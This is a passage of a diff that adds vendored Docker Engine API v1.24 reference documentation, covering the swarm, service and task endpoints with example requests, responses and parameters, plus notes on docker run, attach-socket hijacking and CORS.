+        "Orchestration": {},
+        "Raft": {},
+        "Dispatcher": {},
+        "CAConfig": {}
+      }
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Length: 28
+    Content-Type: application/json
+    Date: Thu, 01 Sep 2016 21:49:13 GMT
+    Server: Docker/1.12.0 (linux)
+
+    "7v2t30z9blmxuhnyo6s4cpenp"
+
+**Status codes**:
+
+-   **200** – no error
+-   **400** – bad parameter
+-   **406** – node is already part of a swarm
+-   **500** - server error
+
+JSON Parameters:
+
+- **ListenAddr** – Listen address used for inter-manager communication, as well as determining
+  the networking interface used for the VXLAN Tunnel Endpoint (VTEP). This can either be an
+  address/port combination in the form `192.168.1.1:4567`, or an interface followed by a port
+  number, like `eth0:4567`. If the port number is omitted, the default swarm listening port is
+  used.
+- **AdvertiseAddr** – Externally reachable address advertised to other nodes. This can either be
+  an address/port combination in the form `192.168.1.1:4567`, or an interface followed by a port
+  number, like `eth0:4567`. If the port number is omitted, the port number from the listen
+  address is used. If `AdvertiseAddr` is not specified, it will be automatically detected when
+  possible.
+- **ForceNewCluster** – Force creation of a new swarm.
+- **Spec** – Configuration settings for the new swarm.
+    - **Orchestration** – Configuration settings for the orchestration aspects of the swarm.
+        - **TaskHistoryRetentionLimit** – Maximum number of tasks history stored.
+    - **Raft** – Raft related configuration.
+        - **SnapshotInterval** – Number of logs entries between snapshot.
+        - **KeepOldSnapshots** – Number of snapshots to keep beyond the current snapshot.
+        - **LogEntriesForSlowFollowers** – Number of log entries to keep around to sync up slow
+          followers after a snapshot is created.
+        - **HeartbeatTick** – Amount of ticks (in seconds) between each heartbeat.
+        - **ElectionTick** – Amount of ticks (in seconds) needed without a leader to trigger a new
+          election.
+    - **Dispatcher** – Configuration settings for the task dispatcher.
+        - **HeartbeatPeriod** – The delay for an agent to send a heartbeat to the dispatcher.
+    - **CAConfig** – Certificate authority configuration.
+        - **NodeCertExpiry** – Automatic expiry for nodes certificates.
+        - **ExternalCA** - Configuration for forwarding signing requests to an external
+          certificate authority.
+            - **Protocol** - Protocol for communication with the external CA
+              (currently only "cfssl" is supported).
+            - **URL** - URL where certificate signing requests should be sent.
+            - **Options** - An object with key/value pairs that are interpreted
+              as protocol-specific options for the external CA driver.
+
+#### Join an existing swarm
+
+`POST /swarm/join`
+
+Join an existing swarm
+
+**Example request**:
+
+    POST /v1.24/swarm/join HTTP/1.1
+    Content-Type: application/json
+
+    {
+      "ListenAddr": "0.0.0.0:2377",
+      "AdvertiseAddr": "192.168.1.1:2377",
+      "RemoteAddrs": ["node1:2377"],
+      "JoinToken": "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2"
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Length: 0
+    Content-Type: text/plain; charset=utf-8
+
+**Status codes**:
+
+-   **200** – no error
+-   **400** – bad parameter
+-   **406** – node is already part of a swarm
+-   **500** - server error
+
+JSON Parameters:
+
+- **ListenAddr** – Listen address used for inter-manager communication if the node gets promoted to
+  manager, as well as determining the networking interface used for the VXLAN Tunnel Endpoint (VTEP).
+- **AdvertiseAddr** – Externally reachable address advertised to other nodes. This can either be
+  an address/port combination in the form `192.168.1.1:4567`, or an interface followed by a port
+  number, like `eth0:4567`. If the port number is omitted, the port number from the listen
+  address is used. If `AdvertiseAddr` is not specified, it will be automatically detected when
+  possible.
+- **RemoteAddr** – Address of any manager node already participating in the swarm.
+- **JoinToken** – Secret token for joining this swarm.
+
+#### Leave a swarm
+
+
+`POST /swarm/leave`
+
+Leave a swarm
+
+**Example request**:
+
+    POST /v1.24/swarm/leave HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Length: 0
+    Content-Type: text/plain; charset=utf-8
+
+**Query parameters**:
+
+- **force** - Boolean (0/1, false/true). Force leave swarm, even if this is the last manager or that it will break the cluster.
+
+**Status codes**:
+
+-  **200** – no error
+-  **406** – node is not part of a swarm
+-  **500** - server error
+
+#### Update a swarm
+
+
+`POST /swarm/update`
+
+Update a swarm
+
+**Example request**:
+
+    POST /v1.24/swarm/update HTTP/1.1
+
+    {
+      "Name": "default",
+      "Orchestration": {
+        "TaskHistoryRetentionLimit": 10
+      },
+      "Raft": {
+        "SnapshotInterval": 10000,
+        "LogEntriesForSlowFollowers": 500,
+        "HeartbeatTick": 1,
+        "ElectionTick": 3
+      },
+      "Dispatcher": {
+        "HeartbeatPeriod": 5000000000
+      },
+      "CAConfig": {
+        "NodeCertExpiry": 7776000000000000
+      },
+      "JoinTokens": {
+        "Worker": "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx",
+        "Manager": "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2"
+      }
+    }
+
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Length: 0
+    Content-Type: text/plain; charset=utf-8
+
+**Query parameters**:
+
+- **version** – The version number of the swarm object being updated. This is
+  required to avoid conflicting writes.
+- **rotateWorkerToken** - Set to `true` (or `1`) to rotate the worker join token.
+- **rotateManagerToken** - Set to `true` (or `1`) to rotate the manager join token.
+
+**Status codes**:
+
+-   **200** – no error
+-   **400** – bad parameter
+-   **406** – node is not part of a swarm
+-   **500** - server error
+
+JSON Parameters:
+
+- **Orchestration** – Configuration settings for the orchestration aspects of the swarm.
+    - **TaskHistoryRetentionLimit** – Maximum number of tasks history stored.
+- **Raft** – Raft related configuration.
+    - **SnapshotInterval** – Number of logs entries between snapshot.
+    - **KeepOldSnapshots** – Number of snapshots to keep beyond the current snapshot.
+    - **LogEntriesForSlowFollowers** – Number of log entries to keep around to sync up slow
+      followers after a snapshot is created.
+    - **HeartbeatTick** – Amount of ticks (in seconds) between each heartbeat.
+    - **ElectionTick** – Amount of ticks (in seconds) needed without a leader to trigger a new
+      election.
+- **Dispatcher** – Configuration settings for the task dispatcher.
+    - **HeartbeatPeriod** – The delay for an agent to send a heartbeat to the dispatcher.
+- **CAConfig** – CA configuration.
+    - **NodeCertExpiry** – Automatic expiry for nodes certificates.
+    - **ExternalCA** - Configuration for forwarding signing requests to an external
+      certificate authority.
+        - **Protocol** - Protocol for communication with the external CA
+          (currently only "cfssl" is supported).
+        - **URL** - URL where certificate signing requests should be sent.
+        - **Options** - An object with key/value pairs that are interpreted
+          as protocol-specific options for the external CA driver.
+- **JoinTokens** - Tokens that can be used by other nodes to join the swarm.
+    - **Worker** - Token to use for joining as a worker.
+    - **Manager** - Token to use for joining as a manager.
+
+### 3.9 Services
+
+**Note**: Service operations require to first be part of a swarm.
+
+#### List services
+
+
+`GET /services`
+
+List services
+
+**Example request**:
+
+    GET /v1.24/services HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+      {
+        "ID": "9mnpnzenvg8p8tdbtq4wvbkcz",
+        "Version": {
+          "Index": 19
+        },
+        "CreatedAt": "2016-06-07T21:05:51.880065305Z",
+        "UpdatedAt": "2016-06-07T21:07:29.962229872Z",
+        "Spec": {
+          "Name": "hopeful_cori",
+          "TaskTemplate": {
+            "ContainerSpec": {
+              "Image": "redis"
+            },
+            "Resources": {
+              "Limits": {},
+              "Reservations": {}
+            },
+            "RestartPolicy": {
+              "Condition": "any",
+              "MaxAttempts": 0
+            },
+            "Placement": {
+              "Constraints": [
+                "node.role == worker"
+              ]
+            }
+          },
+          "Mode": {
+            "Replicated": {
+              "Replicas": 1
+            }
+          },
+          "UpdateConfig": {
+            "Parallelism": 1,
+            "FailureAction": "pause"
+          },
+          "EndpointSpec": {
+            "Mode": "vip",
+            "Ports": [
+              {
+                "Protocol": "tcp",
+                "TargetPort": 6379,
+                "PublishedPort": 30001
+              }
+            ]
+          }
+        },
+        "Endpoint": {
+          "Spec": {
+            "Mode": "vip",
+            "Ports": [
+              {
+                "Protocol": "tcp",
+                "TargetPort": 6379,
+                "PublishedPort": 30001
+              }
+            ]
+          },
+          "Ports": [
+            {
+              "Protocol": "tcp",
+              "TargetPort": 6379,
+              "PublishedPort": 30001
+            }
+          ],
+          "VirtualIPs": [
+            {
+              "NetworkID": "4qvuz4ko70xaltuqbt8956gd1",
+              "Addr": "10.255.0.2/16"
+            },
+            {
+              "NetworkID": "4qvuz4ko70xaltuqbt8956gd1",
+              "Addr": "10.255.0.3/16"
+            }
+          ]
+        }
+      }
+    ]
+
+**Query parameters**:
+
+- **filters** – a JSON encoded value of the filters (a `map[string][]string`) to process on the
+  services list. Available filters:
+  - `id=<service id>`
+  - `label=<service label>`
+  - `name=<service name>`
+
+**Status codes**:
+
+-   **200** – no error
+-   **406** – node is not part of a swarm
+-   **500** – server error
+
+#### Create a service
+
+`POST /services/create`
+
+Create a service. When using this endpoint to create a service using a private
+repository from the registry, the `X-Registry-Auth` header must be used to
+include a base64-encoded AuthConfig object. Refer to the [create an
+image](#create-an-image) section for more details.
+
+**Example request**:
+
+    POST /v1.24/services/create HTTP/1.1
+    Content-Type: application/json
+
+    {
+      "Name": "web",
+      "TaskTemplate": {
+        "ContainerSpec": {
+          "Image": "nginx:alpine",
+          "Mounts": [
+            {
+              "ReadOnly": true,
+              "Source": "web-data",
+              "Target": "/usr/share/nginx/html",
+              "Type": "volume",
+              "VolumeOptions": {
+                "DriverConfig": {
+                },
+                "Labels": {
+                  "com.example.something": "something-value"
+                }
+              }
+            }
+          ],
+          "User": "33"
+        },
+        "Networks": [
+            {
+              "Target": "overlay1"
+            }
+        ],
+        "LogDriver": {
+          "Name": "json-file",
+          "Options": {
+            "max-file": "3",
+            "max-size": "10M"
+          }
+        },
+        "Placement": {
+          "Constraints": [
+            "node.role == worker"
+          ]
+        },
+        "Resources": {
+          "Limits": {
+            "MemoryBytes": 104857600
+          },
+          "Reservations": {
+          }
+        },
+        "RestartPolicy": {
+          "Condition": "on-failure",
+          "Delay": 10000000000,
+          "MaxAttempts": 10
+        }
+      },
+      "Mode": {
+        "Replicated": {
+          "Replicas": 4
+        }
+      },
+      "UpdateConfig": {
+        "Delay": 30000000000,
+        "Parallelism": 2,
+        "FailureAction": "pause"
+      },
+      "EndpointSpec": {
+        "Ports": [
+          {
+            "Protocol": "tcp",
+            "PublishedPort": 8080,
+            "TargetPort": 80
+          }
+        ]
+      },
+      "Labels": {
+        "foo": "bar"
+      }
+    }
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: application/json
+
+    {
+      "ID":"ak7w3gjqoa3kuz8xcpnyy0pvl"
+    }
+
+**Status codes**:
+
+-   **201** – no error
+-   **403** - network is not eligible for services
+-   **406** – node is not part of a swarm
+-   **409** – name conflicts with an existing object
+-   **500** - server error
+
+**JSON Parameters**:
+
+- **Name** – User-defined name for the service.
+- **Labels** – A map of labels to associate with the service (e.g., `{"key":"value", "key2":"value2"}`).
+- **TaskTemplate** – Specification of the tasks to start as part of the new service.
+    - **ContainerSpec** - Container settings for containers started as part of this task.
+        - **Image** – A string specifying the image name to use for the container.
+        - **Command** – The command to be run in the image.
+        - **Args** – Arguments to the command.
+        - **Env** – A list of environment variables in the form of `["VAR=value"[,"VAR2=value2"]]`.
+        - **Dir** – A string specifying the working directory for commands to run in.
+        - **User** – A string value specifying the user inside the container.
+        - **Labels** – A map of labels to associate with the service (e.g.,
+          `{"key":"value", "key2":"value2"}`).
+        - **Mounts** – Specification for mounts to be added to containers
+          created as part of the service.
+            - **Target** – Container path.
+            - **Source** – Mount source (e.g. a volume name, a host path).
+            - **Type** – The mount type (`bind`, or `volume`).
+            - **ReadOnly** – A boolean indicating whether the mount should be read-only.
+            - **BindOptions** - Optional configuration for the `bind` type.
+              - **Propagation** – A propagation mode with the value `[r]private`, `[r]shared`, or `[r]slave`.
+            - **VolumeOptions** – Optional configuration for the `volume` type.
+                - **NoCopy** – A boolean indicating if volume should be
+                  populated with the data from the target. (Default false)
+                - **Labels** – User-defined name and labels for the volume.
+                - **DriverConfig** – Map of driver-specific options.
+                  - **Name** - Name of the driver to use to create the volume.
+                  - **Options** - key/value map of driver specific options.
+        - **StopGracePeriod** – Amount of time to wait for the container to terminate before
+          forcefully killing it.
+    - **LogDriver** - Log configuration for containers created as part of the
+      service.
+        - **Name** - Name of the logging driver to use (`json-file`, `syslog`,
+          `journald`, `gelf`, `fluentd`, `awslogs`, `splunk`, `etwlogs`, `none`).
+        - **Options** - Driver-specific options.
+    - **Resources** – Resource requirements which apply to each individual container created as part
+      of the service.
+        - **Limits** – Define resources limits.
+            - **NanoCPUs** – CPU limit in units of 10<sup>-9</sup> CPU shares.
+            - **MemoryBytes** – Memory limit in Bytes.
+        - **Reservation** – Define resources reservation.
+            - **NanoCPUs** – CPU reservation in units of 10<sup>-9</sup> CPU shares.
+            - **MemoryBytes** – Memory reservation in Bytes.
+    - **RestartPolicy** – Specification for the restart policy which applies to containers created
+      as part of this service.
+        - **Condition** – Condition for restart (`none`, `on-failure`, or `any`).
+        - **Delay** – Delay between restart attempts.
+        - **Attempts** – Maximum attempts to restart a given container before giving up (default value
+          is 0, which is ignored).
+        - **Window** – Windows is the time window used to evaluate the restart policy (default value is
+          0, which is unbounded).
+    - **Placement** – Restrictions on where a service can run.
+        - **Constraints** – An array of constraints, e.g. `[ "node.role == manager" ]`.
+- **Mode** – Scheduling mode for the service (`replicated` or `global`, defaults to `replicated`).
+- **UpdateConfig** – Specification for the update strategy of the service.
+    - **Parallelism** – Maximum number of tasks to be updated in one iteration (0 means unlimited
+      parallelism).
+    - **Delay** – Amount of time between updates.
+    - **FailureAction** - Action to take if an updated task fails to run, or stops running during the
+      update. Values are `continue` and `pause`.
+- **Networks** – Array of network names or IDs to attach the service to.
+- **EndpointSpec** – Properties that can be configured to access and load balance a service.
+    - **Mode** – The mode of resolution to use for internal load balancing
+      between tasks (`vip` or `dnsrr`). Defaults to `vip` if not provided.
+    - **Ports** – List of exposed ports that this service is accessible on from
+      the outside, in the form of:
+      `{"Protocol": <"tcp"|"udp">, "PublishedPort": <port>, "TargetPort": <port>}`.
+      Ports can only be provided if `vip` resolution mode is used.
+
+**Request Headers**:
+
+- **Content-type** – Set to `"application/json"`.
+- **X-Registry-Auth** – base64-encoded AuthConfig object, containing either
+  login information, or a token. Refer to the [create an image](#create-an-image)
+  section for more details.
+
+
+#### Remove a service
+
+
+`DELETE /services/(id or name)`
+
+Stop and remove the service `id`
+
+**Example request**:
+
+    DELETE /v1.24/services/16253994b7c4 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Length: 0
+    Content-Type: text/plain; charset=utf-8
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such service
+-   **406** - node is not part of a swarm
+-   **500** – server error
+
+#### Inspect one or more services
+
+
+`GET /services/(id or name)`
+
+Return information on the service `id`.
+
+**Example request**:
+
+    GET /v1.24/services/1cb4dnqcyx6m66g2t538x3rxha HTTP/1.1
+
+**Example response**:
+
+    {
+      "ID": "ak7w3gjqoa3kuz8xcpnyy0pvl",
+      "Version": {
+        "Index": 95
+      },
+      "CreatedAt": "2016-06-07T21:10:20.269723157Z",
+      "UpdatedAt": "2016-06-07T21:10:20.276301259Z",
+      "Spec": {
+        "Name": "redis",
+        "TaskTemplate": {
+          "ContainerSpec": {
+            "Image": "redis"
+          },
+          "Resources": {
+            "Limits": {},
+            "Reservations": {}
+          },
+          "RestartPolicy": {
+            "Condition": "any",
+            "MaxAttempts": 0
+          },
+          "Placement": {}
+        },
+        "Mode": {
+          "Replicated": {
+            "Replicas": 1
+          }
+        },
+        "UpdateConfig": {
+          "Parallelism": 1,
+          "FailureAction": "pause"
+        },
+        "EndpointSpec": {
+          "Mode": "vip",
+          "Ports": [
+            {
+              "Protocol": "tcp",
+              "TargetPort": 6379,
+              "PublishedPort": 30001
+            }
+          ]
+        }
+      },
+      "Endpoint": {
+        "Spec": {
+          "Mode": "vip",
+          "Ports": [
+            {
+              "Protocol": "tcp",
+              "TargetPort": 6379,
+              "PublishedPort": 30001
+            }
+          ]
+        },
+        "Ports": [
+          {
+            "Protocol": "tcp",
+            "TargetPort": 6379,
+            "PublishedPort": 30001
+          }
+        ],
+        "VirtualIPs": [
+          {
+            "NetworkID": "4qvuz4ko70xaltuqbt8956gd1",
+            "Addr": "10.255.0.4/16"
+          }
+        ]
+      }
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such service
+-   **406** - node is not part of a swarm
+-   **500** – server error
+
+#### Update a service
+
+`POST /services/(id or name)/update`
+
+Update a service. When using this endpoint to create a service using a
+private repository from the registry, the `X-Registry-Auth` header can be used
+to update the authentication information for that is stored for the service.
+The header contains a base64-encoded AuthConfig object. Refer to the [create an
+image](#create-an-image) section for more details.
+
+**Example request**:
+
+    POST /v1.24/services/1cb4dnqcyx6m66g2t538x3rxha/update?version=23 HTTP/1.1
+    Content-Type: application/json
+
+    {
+      "Name": "top",
+      "TaskTemplate": {
+        "ContainerSpec": {
+          "Image": "busybox",
+          "Args": [
+            "top"
+          ]
+        },
+        "Resources": {
+          "Limits": {},
+          "Reservations": {}
+        },
+        "RestartPolicy": {
+          "Condition": "any",
+          "MaxAttempts": 0
+        },
+        "Placement": {}
+      },
+      "Mode": {
+        "Replicated": {
+          "Replicas": 1
+        }
+      },
+      "UpdateConfig": {
+        "Parallelism": 1
+      },
+      "EndpointSpec": {
+        "Mode": "vip"
+      }
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Length: 0
+    Content-Type: text/plain; charset=utf-8
+
+**JSON Parameters**:
+
+- **Name** – User-defined name for the service. Note that renaming services is not supported.
+- **Labels** – A map of labels to associate with the service (e.g., `{"key":"value", "key2":"value2"}`).
+- **TaskTemplate** – Specification of the tasks to start as part of the new service.
+    - **ContainerSpec** - Container settings for containers started as part of this task.
+        - **Image** – A string specifying the image name to use for the container.
+        - **Command** – The command to be run in the image.
+        - **Args** – Arguments to the command.
+        - **Env** – A list of environment variables in the form of `["VAR=value"[,"VAR2=value2"]]`.
+        - **Dir** – A string specifying the working directory for commands to run in.
+        - **User** – A string value specifying the user inside the container.
+        - **Labels** – A map of labels to associate with the service (e.g.,
+          `{"key":"value", "key2":"value2"}`).
+        - **Mounts** – Specification for mounts to be added to containers created as part of the new
+          service.
+            - **Target** – Container path.
+            - **Source** – Mount source (e.g. a volume name, a host path).
+            - **Type** – The mount type (`bind`, or `volume`).
+            - **ReadOnly** – A boolean indicating whether the mount should be read-only.
+            - **BindOptions** - Optional configuration for the `bind` type
+              - **Propagation** – A propagation mode with the value `[r]private`, `[r]shared`, or `[r]slave`.
+            - **VolumeOptions** – Optional configuration for the `volume` type.
+                - **NoCopy** – A boolean indicating if volume should be
+                  populated with the data from the target. (Default false)
+                - **Labels** – User-defined name and labels for the volume.
+                - **DriverConfig** – Map of driver-specific options.
+                  - **Name** - Name of the driver to use to create the volume
+                  - **Options** - key/value map of driver specific options
+        - **StopGracePeriod** – Amount of time to wait for the container to terminate before
+          forcefully killing it.
+    - **Resources** – Resource requirements which apply to each individual container created as part
+      of the service.
+        - **Limits** – Define resources limits.
+            - **CPU** – CPU limit
+            - **Memory** – Memory limit
+        - **Reservation** – Define resources reservation.
+            - **CPU** – CPU reservation
+            - **Memory** – Memory reservation
+    - **RestartPolicy** – Specification for the restart policy which applies to containers created
+      as part of this service.
+        - **Condition** – Condition for restart (`none`, `on-failure`, or `any`).
+        - **Delay** – Delay between restart attempts.
+        - **MaxAttempts** – Maximum attempts to restart a given container before giving up (default value
+          is 0, which is ignored).
+        - **Window** – Windows is the time window used to evaluate the restart policy (default value is
+          0, which is unbounded).
+    - **Placement** – Restrictions on where a service can run.
+        - **Constraints** – An array of constraints, e.g. `[ "node.role == manager" ]`.
+- **Mode** – Scheduling mode for the service (`replicated` or `global`, defaults to `replicated`).
+- **UpdateConfig** – Specification for the update strategy of the service.
+    - **Parallelism** – Maximum number of tasks to be updated in one iteration (0 means unlimited
+      parallelism).
+    - **Delay** – Amount of time between updates.
+- **Networks** – Array of network names or IDs to attach the service to.
+- **EndpointSpec** – Properties that can be configured to access and load balance a service.
+    - **Mode** – The mode of resolution to use for internal load balancing
+      between tasks (`vip` or `dnsrr`). Defaults to `vip` if not provided.
+    - **Ports** – List of exposed ports that this service is accessible on from
+      the outside, in the form of:
+      `{"Protocol": <"tcp"|"udp">, "PublishedPort": <port>, "TargetPort": <port>}`.
+      Ports can only be provided if `vip` resolution mode is used.
+
+**Query parameters**:
+
+- **version** – The version number of the service object being updated. This is
+  required to avoid conflicting writes.
+
+**Request Headers**:
+
+- **Content-type** – Set to `"application/json"`.
+- **X-Registry-Auth** – base64-encoded AuthConfig object, containing either
+  login information, or a token. Refer to the [create an image](#create-an-image)
+  section for more details.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such service
+-   **406** - node is not part of a swarm
+-   **500** – server error
+
+### 3.10 Tasks
+
+**Note**: Task operations require the engine to be part of a swarm.
+
+#### List tasks
+
+
+`GET /tasks`
+
+List tasks
+
+**Example request**:
+
+    GET /v1.24/tasks HTTP/1.1
+
+**Example response**:
+
+    [
+      {
+        "ID": "0kzzo1i0y4jz6027t0k7aezc7",
+        "Version": {
+          "Index": 71
+        },
+        "CreatedAt": "2016-06-07T21:07:31.171892745Z",
+        "UpdatedAt": "2016-06-07T21:07:31.376370513Z",
+        "Spec": {
+          "ContainerSpec": {
+            "Image": "redis"
+          },
+          "Resources": {
+            "Limits": {},
+            "Reservations": {}
+          },
+          "RestartPolicy": {
+            "Condition": "any",
+            "MaxAttempts": 0
+          },
+          "Placement": {}
+        },
+        "ServiceID": "9mnpnzenvg8p8tdbtq4wvbkcz",
+        "Slot": 1,
+        "NodeID": "60gvrl6tm78dmak4yl7srz94v",
+        "Status": {
+          "Timestamp": "2016-06-07T21:07:31.290032978Z",
+          "State": "running",
+          "Message": "started",
+          "ContainerStatus": {
+            "ContainerID": "e5d62702a1b48d01c3e02ca1e0212a250801fa8d67caca0b6f35919ebc12f035",
+            "PID": 677
+          }
+        },
+        "DesiredState": "running",
+        "NetworksAttachments": [
+          {
+            "Network": {
+              "ID": "4qvuz4ko70xaltuqbt8956gd1",
+              "Version": {
+                "Index": 18
+              },
+              "CreatedAt": "2016-06-07T20:31:11.912919752Z",
+              "UpdatedAt": "2016-06-07T21:07:29.955277358Z",
+              "Spec": {
+                "Name": "ingress",
+                "Labels": {
+                  "com.docker.swarm.internal": "true"
+                },
+                "DriverConfiguration": {},
+                "IPAMOptions": {
+                  "Driver": {},
+                  "Configs": [
+                    {
+                      "Subnet": "10.255.0.0/16",
+                      "Gateway": "10.255.0.1"
+                    }
+                  ]
+                }
+              },
+              "DriverState": {
+                "Name": "overlay",
+                "Options": {
+                  "com.docker.network.driver.overlay.vxlanid_list": "256"
+                }
+              },
+              "IPAMOptions": {
+                "Driver": {
+                  "Name": "default"
+                },
+                "Configs": [
+                  {
+                    "Subnet": "10.255.0.0/16",
+                    "Gateway": "10.255.0.1"
+                  }
+                ]
+              }
+            },
+            "Addresses": [
+              "10.255.0.10/16"
+            ]
+          }
+        ],
+      },
+      {
+        "ID": "1yljwbmlr8er2waf8orvqpwms",
+        "Version": {
+          "Index": 30
+        },
+        "CreatedAt": "2016-06-07T21:07:30.019104782Z",
+        "UpdatedAt": "2016-06-07T21:07:30.231958098Z",
+        "Name": "hopeful_cori",
+        "Spec": {
+          "ContainerSpec": {
+            "Image": "redis"
+          },
+          "Resources": {
+            "Limits": {},
+            "Reservations": {}
+          },
+          "RestartPolicy": {
+            "Condition": "any",
+            "MaxAttempts": 0
+          },
+          "Placement": {}
+        },
+        "ServiceID": "9mnpnzenvg8p8tdbtq4wvbkcz",
+        "Slot": 1,
+        "NodeID": "60gvrl6tm78dmak4yl7srz94v",
+        "Status": {
+          "Timestamp": "2016-06-07T21:07:30.202183143Z",
+          "State": "shutdown",
+          "Message": "shutdown",
+          "ContainerStatus": {
+            "ContainerID": "1cf8d63d18e79668b0004a4be4c6ee58cddfad2dae29506d8781581d0688a213"
+          }
+        },
+        "DesiredState": "shutdown",
+        "NetworksAttachments": [
+          {
+            "Network": {
+              "ID": "4qvuz4ko70xaltuqbt8956gd1",
+              "Version": {
+                "Index": 18
+              },
+              "CreatedAt": "2016-06-07T20:31:11.912919752Z",
+              "UpdatedAt": "2016-06-07T21:07:29.955277358Z",
+              "Spec": {
+                "Name": "ingress",
+                "Labels": {
+                  "com.docker.swarm.internal": "true"
+                },
+                "DriverConfiguration": {},
+                "IPAMOptions": {
+                  "Driver": {},
+                  "Configs": [
+                    {
+                      "Subnet": "10.255.0.0/16",
+                      "Gateway": "10.255.0.1"
+                    }
+                  ]
+                }
+              },
+              "DriverState": {
+                "Name": "overlay",
+                "Options": {
+                  "com.docker.network.driver.overlay.vxlanid_list": "256"
+                }
+              },
+              "IPAMOptions": {
+                "Driver": {
+                  "Name": "default"
+                },
+                "Configs": [
+                  {
+                    "Subnet": "10.255.0.0/16",
+                    "Gateway": "10.255.0.1"
+                  }
+                ]
+              }
+            },
+            "Addresses": [
+              "10.255.0.5/16"
+            ]
+          }
+        ]
+      }
+    ]
+
+**Query parameters**:
+
+- **filters** – a JSON encoded value of the filters (a `map[string][]string`) to process on the
+  services list. Available filters:
+  - `id=<task id>`
+  - `name=<task name>`
+  - `service=<service name>`
+  - `node=<node id or name>`
+  - `label=key` or `label="key=value"`
+  - `desired-state=(running | shutdown | accepted)`
+
+**Status codes**:
+
+-   **200** – no error
+-   **406** - node is not part of a swarm
+-   **500** – server error
+
+#### Inspect a task
+
+
+`GET /tasks/(id)`
+
+Get details on the task `id`
+
+**Example request**:
+
+    GET /v1.24/tasks/0kzzo1i0y4jz6027t0k7aezc7 HTTP/1.1
+
+**Example response**:
+
+    {
+      "ID": "0kzzo1i0y4jz6027t0k7aezc7",
+      "Version": {
+        "Index": 71
+      },
+      "CreatedAt": "2016-06-07T21:07:31.171892745Z",
+      "UpdatedAt": "2016-06-07T21:07:31.376370513Z",
+      "Spec": {
+        "ContainerSpec": {
+          "Image": "redis"
+        },
+        "Resources": {
+          "Limits": {},
+          "Reservations": {}
+        },
+        "RestartPolicy": {
+          "Condition": "any",
+          "MaxAttempts": 0
+        },
+        "Placement": {}
+      },
+      "ServiceID": "9mnpnzenvg8p8tdbtq4wvbkcz",
+      "Slot": 1,
+      "NodeID": "60gvrl6tm78dmak4yl7srz94v",
+      "Status": {
+        "Timestamp": "2016-06-07T21:07:31.290032978Z",
+        "State": "running",
+        "Message": "started",
+        "ContainerStatus": {
+          "ContainerID": "e5d62702a1b48d01c3e02ca1e0212a250801fa8d67caca0b6f35919ebc12f035",
+          "PID": 677
+        }
+      },
+      "DesiredState": "running",
+      "NetworksAttachments": [
+        {
+          "Network": {
+            "ID": "4qvuz4ko70xaltuqbt8956gd1",
+            "Version": {
+              "Index": 18
+            },
+            "CreatedAt": "2016-06-07T20:31:11.912919752Z",
+            "UpdatedAt": "2016-06-07T21:07:29.955277358Z",
+            "Spec": {
+              "Name": "ingress",
+              "Labels": {
+                "com.docker.swarm.internal": "true"
+              },
+              "DriverConfiguration": {},
+              "IPAMOptions": {
+                "Driver": {},
+                "Configs": [
+                  {
+                    "Subnet": "10.255.0.0/16",
+                    "Gateway": "10.255.0.1"
+                  }
+                ]
+              }
+            },
+            "DriverState": {
+              "Name": "overlay",
+              "Options": {
+                "com.docker.network.driver.overlay.vxlanid_list": "256"
+              }
+            },
+            "IPAMOptions": {
+              "Driver": {
+                "Name": "default"
+              },
+              "Configs": [
+                {
+                  "Subnet": "10.255.0.0/16",
+                  "Gateway": "10.255.0.1"
+                }
+              ]
+            }
+          },
+          "Addresses": [
+            "10.255.0.10/16"
+          ]
+        }
+      ]
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – unknown task
+-   **406** - node is not part of a swarm
+-   **500** – server error
+
+## 4. Going further
+
+### 4.1 Inside `docker run`
+
+As an example, the `docker run` command line makes the following API calls:
+
+- Create the container
+
+- If the status code is 404, it means the image doesn't exist:
+    - Try to pull it.
+    - Then, retry to create the container.
+
+- Start the container.
+
+- If you are not in detached mode:
+- Attach to the container, using `logs=1` (to have `stdout` and
+      `stderr` from the container's start) and `stream=1`
+
+- If in detached mode or only `stdin` is attached, display the container's id.
+
+### 4.2 Hijacking
+
+In this version of the API, `/attach`, uses hijacking to transport `stdin`,
+`stdout`, and `stderr` on the same socket.
+
+To hint potential proxies about connection hijacking, Docker client sends
+connection upgrade headers similarly to websocket.
+
+    Upgrade: tcp
+    Connection: Upgrade
+
+When Docker daemon detects the `Upgrade` header, it switches its status code
+from **200 OK** to **101 UPGRADED** and resends the same headers.
+
+
+### 4.3 CORS Requests
+
+To set cross origin requests to the Engine API please give values to
+`--api-cors-header` when running Docker in daemon mode. Set * (asterisk) allows all,
+default or blank means CORS disabled
+
+    $ dockerd -H="192.168.1.9:2375" --api-cors-header="http://foo.bar"
diff --git a/vendor/github.com/docker/docker/docs/api/version-history.md b/vendor/github.com/docker/docker/docs/api/version-history.md
new file mode 100644
index 0000000000..4363cfbd74
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/api/version-history.md
@@ -0,0 +1,249 @@
+---
+title: "Engine API version history"
+description: "Documentation of changes that have been made to Engine API."
+keywords: "API, Docker, rcli, REST, documentation"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+## v1.26 API changes
+
